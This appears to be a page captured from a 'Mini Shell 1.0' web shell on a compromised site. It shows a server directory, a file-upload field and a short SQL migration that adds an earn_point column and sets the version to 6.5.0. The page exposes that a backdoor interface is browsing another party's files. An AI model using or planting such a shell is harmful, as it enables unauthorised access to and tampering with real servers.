HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/_sqlupdates/
Upload File :
Current File : /var/www/negocios.lapieza.do/_sqlupdates/v650.sql
ALTER TABLE `order_details` ADD `earn_point` DOUBLE(25,2) NOT NULL DEFAULT '0.00' AFTER `product_referral_code`;

UPDATE `business_settings` SET `value` = '6.5.0' WHERE `business_settings`.`type` = 'current_version';

COMMIT;